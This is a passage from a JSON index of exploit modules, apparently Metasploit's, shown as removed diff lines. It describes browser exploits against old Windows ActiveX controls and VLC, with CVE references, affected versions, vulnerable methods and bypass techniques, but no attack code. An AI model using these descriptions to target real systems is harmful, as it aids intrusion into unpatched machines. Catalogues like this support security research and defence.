When sending an overly long string to the GetDriveName() method\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2007-1682", - "OSVDB-47794", - "US-CERT-VU-914785", - "BID-30826" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/softartisans_getdrivename.rb", - "is_install_path": true, - "ref_name": "windows/browser/softartisans_getdrivename", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/sonicwall_addrouteentry": { - "name": "SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/sonicwall_addrouteentry", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-11-01", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in SonicWall SSL-VPN NetExtender.\n By sending an overly long string to the \"AddRouteEntry()\" method located\n in the NELaunchX.dll (1.0.0.26) Control, an attacker may be able to execute\n arbitrary code.", - "references": [ - "CVE-2007-5603", - "OSVDB-39069", - "URL-http://www.sec-consult.com/303.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "IE 6 / Windows XP SP2 Pro English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/sonicwall_addrouteentry.rb", - "is_install_path": true, - "ref_name": "windows/browser/sonicwall_addrouteentry", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - 
"exploit_windows/browser/symantec_altirisdeployment_downloadandinstall": { - "name": "Symantec Altiris Deployment Solution ActiveX Control Arbitrary File Download and Execute", - "fullname": "exploit/windows/browser/symantec_altirisdeployment_downloadandinstall", - "aliases": [], - "rank": 600, - "disclosure_date": "2009-09-09", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module allows remote attackers to install and execute arbitrary files on a users file system via\n AeXNSPkgDLLib.dll (6.0.0.1418). This module was tested against Symantec Altiris Deployment Solution 6.9 sp3.", - "references": [ - "BID-36346", - "CVE-2009-3028", - "OSVDB-57893" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb", - "is_install_path": true, - "ref_name": "windows/browser/symantec_altirisdeployment_downloadandinstall", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/symantec_altirisdeployment_runcmd": { - "name": "Symantec Altiris Deployment Solution ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/symantec_altirisdeployment_runcmd", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-11-04", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Symantec Altiris Deployment Solution.\n When sending an overly long string to RunCmd() method of\n AeXNSConsoleUtilities.dll (6.0.0.1426) an attacker may be able to execute arbitrary\n code.", - "references": [ - "CVE-2009-3033", - "BID-37092", - "OSVDB-60496" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - 
"targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb", - "is_install_path": true, - "ref_name": "windows/browser/symantec_altirisdeployment_runcmd", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/symantec_appstream_unsafe": { - "name": "Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute", - "fullname": "exploit/windows/browser/symantec_appstream_unsafe", - "aliases": [], - "rank": 600, - "disclosure_date": "2009-01-15", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a vulnerability in Symantec AppStream Client 5.x. The vulnerability\n is in the LaunchObj ActiveX control (launcher.dll 5.1.0.82) containing the \"installAppMgr()\"\n method. The insecure method can be exploited to download and execute arbitrary files in the\n context of the currently logged-on user.", - "references": [ - "CVE-2008-4388", - "OSVDB-51410" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/symantec_appstream_unsafe.rb", - "is_install_path": true, - "ref_name": "windows/browser/symantec_appstream_unsafe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/symantec_backupexec_pvcalendar": { - "name": "Symantec BackupExec Calendar Control Buffer Overflow", - "fullname": "exploit/windows/browser/symantec_backupexec_pvcalendar", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-02-28", - "type": "exploit", - "author": [ - "Elazar Broad " - ], - 
"description": "This module exploits a stack buffer overflow in Symantec BackupExec Calendar Control.\n By sending an overly long string to the \"_DOWText0\" property located\n in the pvcalendar.ocx control, an attacker may be able to execute\n arbitrary code.", - "references": [ - "CVE-2007-6016", - "OSVDB-42358", - "BID-26904", - "URL-http://web.archive.org/web/20080302192347/http://secunia.com:80/advisories/27885/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP2 / IE 6.0 SP0-2 & IE 7.0 English" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb", - "is_install_path": true, - "ref_name": "windows/browser/symantec_backupexec_pvcalendar", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/symantec_consoleutilities_browseandsavefile": { - "name": "Symantec ConsoleUtilities ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/symantec_consoleutilities_browseandsavefile", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-11-02", - "type": "exploit", - "author": [ - "Nikolas Sotiriu (lofi)" - ], - "description": "This module exploits a stack buffer overflow in Symantecs ConsoleUtilities.\n By sending an overly long string to the \"BrowseAndSaveFile()\" method located\n in the AeXNSConsoleUtilities.dll (6.0.0.1846) Control, an attacker may be able to\n execute arbitrary code", - "references": [ - "CVE-2009-3031", - "OSVDB-59597", - "BID-36698", - "URL-http://sotiriu.de/adv/NSOADV-2009-001.txt", - "URL-http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2009&suid=20091102_00" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - 
"autofilter_services": [], - "targets": [ - "Windows XP SP3 English", - "Windows XP SP2 Universal", - "Windows XP SP2 Pro German", - "Windows XP SP3 Pro German" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb", - "is_install_path": true, - "ref_name": "windows/browser/symantec_consoleutilities_browseandsavefile", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/synactis_connecttosynactis_bof": { - "name": "Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow", - "fullname": "exploit/windows/browser/synactis_connecttosynactis_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-05-30", - "type": "exploit", - "author": [ - "h1ch4m", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in Synactis' PDF In-The-Box ActiveX\n component, specifically PDF_IN_1.ocx. 
When a long string of data is given\n to the ConnectToSynactis function, which is meant to be used for the ldCmdLine\n argument of a WinExec call, a strcpy routine can end up overwriting a TRegistry\n class pointer saved on the stack, resulting in arbitrary code execution under the\n context of the user.\n\n Also note that since the WinExec function is used to call the default browser,\n you must be aware that: 1) The default must be Internet Explorer, and 2) when the\n exploit runs, another browser will pop up.\n\n Synactis PDF In-The-Box is also used by other software such as Logic Print 2013,\n which is how the vulnerability was found and publicly disclosed.", - "references": [ - "OSVDB-93754", - "EDB-25835" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 7 on Windows XP SP3", - "IE 8 on Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb", - "is_install_path": true, - "ref_name": "windows/browser/synactis_connecttosynactis_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/systemrequirementslab_unsafe": { - "name": "Husdawg, LLC. System Requirements Lab ActiveX Unsafe Method", - "fullname": "exploit/windows/browser/systemrequirementslab_unsafe", - "aliases": [], - "rank": 600, - "disclosure_date": "2008-10-16", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module allows attackers to execute code via an unsafe method in\n Husdawg, LLC. 
System Requirements Lab ActiveX Control (sysreqlab2.dll 2.30.0.0)", - "references": [ - "CVE-2008-4385", - "OSVDB-50122", - "US-CERT-VU-166651" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb", - "is_install_path": true, - "ref_name": "windows/browser/systemrequirementslab_unsafe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/teechart_pro": { - "name": "TeeChart Professional ActiveX Control Trusted Integer Dereference", - "fullname": "exploit/windows/browser/teechart_pro", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-08-11", - "type": "exploit", - "author": [ - "mr_me ", - "sinn3r " - ], - "description": "This module exploits an integer overflow in TeeChart Pro ActiveX control. When\n sending an overly large/negative integer value to the AddSeries() property of\n TeeChart2010.ocx, the code will perform an arithmetic operation that wraps the\n value and is later directly trusted and called upon.\n\n This module has been designed to bypass DEP only under IE8 with Java support. 
Multiple\n versions (including the latest version) are affected by this vulnerability that date\n back to as far as 2001.\n\n The following controls are vulnerable:\n\n TeeChart5.ocx Version 5.0.1.0 (clsid: B6C10489-FB89-11D4-93C9-006008A7EED4);\n TeeChart6.ocx Version 6.0.0.5 (clsid: 536600D3-70FE-4C50-92FB-640F6BFC49AD);\n TeeChart7.ocx Version 7.0.1.4 (clsid: FAB9B41C-87D6-474D-AB7E-F07D78F2422E);\n TeeChart8.ocx Version 8.0.0.8 (clsid: BDEB0088-66F9-4A55-ABD2-0BF8DEEC1196);\n TeeChart2010.ocx Version 2010.0.0.3 (clsid: FCB4B50A-E3F1-4174-BD18-54C3B3287258).\n\n The controls are deployed under several SCADA based systems including:\n\n Unitronics OPC server v1.3;\n BACnet Operator Workstation Version 1.0.76", - "references": [ - "OSVDB-74446", - "URL-http://www.stratsec.net/Research/Advisories/TeeChart-Professional-Integer-Overflow" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows XP SP0-SP3 (IE6/IE7)", - "Windows XP SP0-SP3 + JAVA + DEP bypass (IE8)", - "Windows 7 + JAVA + DEP bypass (IE8)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/teechart_pro.rb", - "is_install_path": true, - "ref_name": "windows/browser/teechart_pro", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/tom_sawyer_tsgetx71ex552": { - "name": "Tom Sawyer Software GET Extension Factory Remote Code Execution", - "fullname": "exploit/windows/browser/tom_sawyer_tsgetx71ex552", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-05-03", - "type": "exploit", - "author": [ - "Elazar Broad", - "rgod", - "juan vazquez " - ], - "description": "This module exploits a remote code execution vulnerability in the tsgetx71ex553.dll\n ActiveX control installed with Tom Sawyer GET Extension Factory due to an incorrect\n initialization 
under Internet Explorer.\n\n While the Tom Sawyer GET Extension Factory is installed with some versions of VMware\n Infrastructure Client, this module has been tested only with the versions installed\n with Embarcadero Technologies ER/Studio XE2 / Embarcadero Studio Portal 1.6. The ActiveX\n control tested is tsgetx71ex553.dll, version 5.5.3.238.\n\n This module achieves DEP and ASLR bypass using the well known msvcr71.dll rop chain. The\n dll is installed by default with the Embarcadero software, and loaded by the targeted\n ActiveX.", - "references": [ - "CVE-2011-2217", - "OSVDB-73211", - "BID-48099", - "URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=911" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 6 on Windows XP SP3", - "IE 7 on Windows XP SP3", - "IE 8 on Windows XP SP3", - "IE 8 on Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb", - "is_install_path": true, - "ref_name": "windows/browser/tom_sawyer_tsgetx71ex552", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/trendmicro_extsetowner": { - "name": "Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution", - "fullname": "exploit/windows/browser/trendmicro_extsetowner", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-08-25", - "type": "exploit", - "author": [ - "Trancer " - ], - "description": "This module exploits a remote code execution vulnerability in Trend Micro\n Internet Security Pro 2010 ActiveX.\n When sending an invalid pointer to the extSetOwner() function of UfPBCtrl.dll\n an attacker may be able to execute arbitrary code.", - "references": [ - 
"CVE-2010-3189", - "OSVDB-67561", - "ZDI-10-165", - "EDB-14878" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/trendmicro_extsetowner.rb", - "is_install_path": true, - "ref_name": "windows/browser/trendmicro_extsetowner", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/trendmicro_officescan": { - "name": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/trendmicro_officescan", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-02-12", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. 
By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2007-0325", - "OSVDB-33040", - "BID-22585" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP2 Pro English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/trendmicro_officescan.rb", - "is_install_path": true, - "ref_name": "windows/browser/trendmicro_officescan", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/tumbleweed_filetransfer": { - "name": "Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/tumbleweed_filetransfer", - "aliases": [], - "rank": 500, - "disclosure_date": "2008-04-07", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a stack buffer overflow in the vcst_eu.dll\n FileTransfer Module (1.0.0.5) ActiveX control in the Tumbleweed\n SecureTransport suite. 
By sending an overly long string to the\n TransferFile() 'remotefile' function, an attacker may be able\n to execute arbitrary code.", - "references": [ - "CVE-2008-1724", - "OSVDB-44252", - "URL-http://www.aushack.com/200708-tumbleweed.txt" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal vcst_eu.dll", - "Windows 2000 Pro English", - "Windows XP Pro SP0/SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/tumbleweed_filetransfer.rb", - "is_install_path": true, - "ref_name": "windows/browser/tumbleweed_filetransfer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ubisoft_uplay_cmd_exec": { - "name": "Ubisoft uplay 2.0.3 ActiveX Control Arbitrary Code Execution", - "fullname": "exploit/windows/browser/ubisoft_uplay_cmd_exec", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-07-29", - "type": "exploit", - "author": [ - "Tavis Ormandy ", - "Ben Campbell ", - "phillips321 ", - "Richard Hicks " - ], - "description": "The uplay ActiveX component allows an attacker to execute any command line action.\n User must sign in, unless auto-sign in is enabled and uplay must not already be\n running. 
Due to the way the malicious executable is served (WebDAV), the module\n must be run on port 80, so please make sure you have enough privilege to do that.\n Ubisoft released patch 2.04 as of Mon 20th July.", - "references": [ - "CVE-2012-4177", - "OSVDB-84402", - "URL-https://seclists.org/fulldisclosure/2012/Jul/375", - "URL-http://forums.ubi.com/showthread.php/699940-Uplay-PC-Patch-2-0-4-Security-fix" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb", - "is_install_path": true, - "ref_name": "windows/browser/ubisoft_uplay_cmd_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ultramjcam_openfiledig_bof": { - "name": "TRENDnet SecurView Internet Camera UltraMJCam OpenFileDlg Buffer Overflow", - "fullname": "exploit/windows/browser/ultramjcam_openfiledig_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-03-28", - "type": "exploit", - "author": [ - "rgod", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in TRENDnet SecurView Internet\n Camera's ActiveX control. 
By supplying a long string of data as the sFilter\n argument of the OpenFileDlg() function, it is possible to trigger a buffer\n overflow condition due to WideCharToMultiByte (which converts unicode back to)\n overwriting the stack more than it should, which results arbitrary code execution\n under the context of the user.", - "references": [ - "CVE-2012-4876", - "OSVDB-80661", - "EDB-18675" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 6 on Windows XP SP3", - "IE 7 on Windows XP SP3", - "IE 7 on Windows Vista" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb", - "is_install_path": true, - "ref_name": "windows/browser/ultramjcam_openfiledig_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ultraoffice_httpupload": { - "name": "Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow", - "fullname": "exploit/windows/browser/ultraoffice_httpupload", - "aliases": [], - "rank": 400, - "disclosure_date": "2008-08-27", - "type": "exploit", - "author": [ - "shinnai", - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in Ultra Shareware's Office\n Control. When processing the 'HttpUpload' method, the arguments are concatenated\n together to form a command line to run a bundled version of cURL. If the command\n fails to run, a stack-based buffer overflow occurs when building the error\n message. 
This is due to the use of sprintf() without proper bounds checking.\n\n NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload\n into memory unmodified.", - "references": [ - "CVE-2008-3878", - "OSVDB-47866", - "BID-30861", - "EDB-6318" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ultraoffice_httpupload.rb", - "is_install_path": true, - "ref_name": "windows/browser/ultraoffice_httpupload", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/verypdf_pdfview": { - "name": "VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow", - "fullname": "exploit/windows/browser/verypdf_pdfview", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-06-16", - "type": "exploit", - "author": [ - "MC ", - "dean " - ], - "description": "The VeryPDF PDFView ActiveX control is prone to a heap buffer-overflow\n because it fails to properly bounds-check user-supplied data before copying\n it into an insufficiently sized memory buffer. 
An attacker can exploit this issue\n to execute arbitrary code within the context of the affected application.", - "references": [ - "CVE-2008-5492", - "OSVDB-49871", - "BID-32313" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/verypdf_pdfview.rb", - "is_install_path": true, - "ref_name": "windows/browser/verypdf_pdfview", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/viscom_movieplayer_drawtext": { - "name": "Viscom Software Movie Player Pro SDK ActiveX 6.8", - "fullname": "exploit/windows/browser/viscom_movieplayer_drawtext", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-01-12", - "type": "exploit", - "author": [ - "shinnai", - "TecR0c ", - "mr_me " - ], - "description": "Stack-based buffer overflow in the MOVIEPLAYER.MoviePlayerCtrl.1 ActiveX control\n in MoviePlayer.ocx 6.8.0.0 in Viscom Software Movie Player Pro SDK ActiveX 6.8 allows\n remote attackers to execute arbitrary code via a long strFontName parameter to the\n DrawText method.\n\n The victim will first be required to trust the publisher Viscom Software.\n This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7\n with Java support.", - "references": [ - "CVE-2010-0356", - "OSVDB-61634", - "EDB-12320" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows IE6-7", - "Windows IE8 + JAVA 6 (DEP & ASLR BYPASS)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb", - "is_install_path": true, - "ref_name": 
"windows/browser/viscom_movieplayer_drawtext", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/vlc_amv": { - "name": "VLC AMV Dangling Pointer Vulnerability", - "fullname": "exploit/windows/browser/vlc_amv", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-03-23", - "type": "exploit", - "author": [ - "sinn3r " - ], - "description": "This module exploits VLC media player when handling a .AMV file. By flipping\n the 0x41st byte in the file format (video width/height), VLC crashes due to an\n invalid pointer, which allows remote attackers to gain arbitrary code execution.\n The vulnerable packages include: VLC 1.1.4, VLC 1.1.5, VLC 1.1.6, VLC 1.1.7. Also,\n please note that IE 8 targets require Java support in order to run properly.", - "references": [ - "CVE-2010-3275", - "OSVDB-71277", - "URL-http://www.coresecurity.com/content/vlc-vulnerabilities-amv-nsv-files", - "URL-http://web.archive.org/web/20130610070348/http://git.videolan.org/?p=vlc/vlc-1.1.git;a=commitdiff;h=fe44129dc6509b3347113ab0e1a0524af1e0dd11" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Internet Explorer 6 on XP SP3", - "Internet Explorer 7 on XP SP3", - "Internet Explorer 8 on XP SP3", - "Internet Explorer 7 on Vista" - ], - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/exploits/windows/browser/vlc_amv.rb", - "is_install_path": true, - "ref_name": "windows/browser/vlc_amv", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/vlc_mms_bof": { - "name": "VLC MMS Stream Handling Buffer Overflow", - "fullname": "exploit/windows/browser/vlc_mms_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-03-15", - "type": "exploit", - 
"author": [ - "Florent Hochwelker", - "sinn3r ", - "juan vazquez " - ], - "description": "This module exploits a buffer overflow in VLC media player VLC media player prior\n to 2.0.0. The vulnerability is due to a dangerous use of sprintf which can result\n in a stack buffer overflow when handling a malicious MMS URI.\n\n This module uses the browser as attack vector. A specially crafted MMS URI is\n used to trigger the overflow and get flow control through SEH overwrite. Control\n is transferred to code located in the heap through a standard heap spray.\n\n The module only targets IE6 and IE7 because no DEP/ASLR bypass has been provided.", - "references": [ - "CVE-2012-1775", - "OSVDB-80188", - "URL-http://www.videolan.org/security/sa1201.html", - "URL-http://web.archive.org/web/20130612051447/http://git.videolan.org/?p=vlc/vlc-2.0.git;a=commit;h=11a95cce96fffdbaba1be6034d7b42721667821c" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Internet Explorer 6 on XP SP3", - "Internet Explorer 7 on XP SP3" - ], - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/exploits/windows/browser/vlc_mms_bof.rb", - "is_install_path": true, - "ref_name": "windows/browser/vlc_mms_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/webdav_dll_hijacker": { - "name": "WebDAV Application DLL Hijacker", - "fullname": "exploit/windows/browser/webdav_dll_hijacker", - "aliases": [], - "rank": 0, - "disclosure_date": "2010-08-18", - "type": "exploit", - "author": [ - "hdm ", - "jduck ", - "jcran " - ], - "description": "This module presents a directory of file extensions that can lead to\n code execution when opened from the share. 
The default EXTENSIONS option\n must be configured to specify a vulnerable application type.", - "references": [ - "URL-http://blog.zoller.lu/2010/08/cve-2010-xn-loadlibrarygetprocaddress.html", - "URL-http://www.acrossecurity.com/aspr/ASPR-2010-08-18-1-PUB.txt" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/webdav_dll_hijacker.rb", - "is_install_path": true, - "ref_name": "windows/browser/webdav_dll_hijacker", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/webex_ucf_newobject": { - "name": "WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow", - "fullname": "exploit/windows/browser/webex_ucf_newobject", - "aliases": [], - "rank": 400, - "disclosure_date": "2008-08-06", - "type": "exploit", - "author": [ - "Tobias Klein", - "Elazar Broad", - "Guido Landi", - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in WebEx's WebexUCFObject\n ActiveX Control. If a long string is passed to the 'NewObject' method, a stack-\n based buffer overflow will occur when copying attacker-supplied data using the\n sprintf function.\n\n It is noteworthy that this vulnerability was discovered and reported by multiple\n independent researchers. 
To quote iDefense's advisory, \"Before this issue was\n publicly reported, at least three independent security researchers had knowledge\n of this issue; thus, it is reasonable to believe that even more people were aware\n of this issue before disclosure.\"\n\n NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload\n into memory unmodified.", - "references": [ - "CVE-2008-3558", - "OSVDB-47344", - "BID-30578", - "EDB-6220", - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=849", - "URL-http://www.trapkit.de/advisories/TKADV2008-009.txt", - "URL-http://tk-blog.blogspot.com/2008/09/vulnerability-rediscovery-xss-and-webex.html", - "URL-http://archives.neohapsis.com/archives/fulldisclosure/2008-08/0084.html", - "URL-http://www.cisco.com/en/US/products/products_security_advisory09186a00809e2006.shtml" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/webex_ucf_newobject.rb", - "is_install_path": true, - "ref_name": "windows/browser/webex_ucf_newobject", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/wellintech_kingscada_kxclientdownload": { - "name": "KingScada kxClientDownload.ocx ActiveX Remote Code Execution", - "fullname": "exploit/windows/browser/wellintech_kingscada_kxclientdownload", - "aliases": [], - "rank": 400, - "disclosure_date": "2014-01-14", - "type": "exploit", - "author": [ - "Andrea Micalizzi", - "juan vazquez " - ], - "description": "This module abuses the kxClientDownload.ocx ActiveX control distributed with WellingTech KingScada.\n The ProjectURL property can be abused to download and load arbitrary DLLs from\n arbitrary locations, leading to arbitrary code execution, because of a 
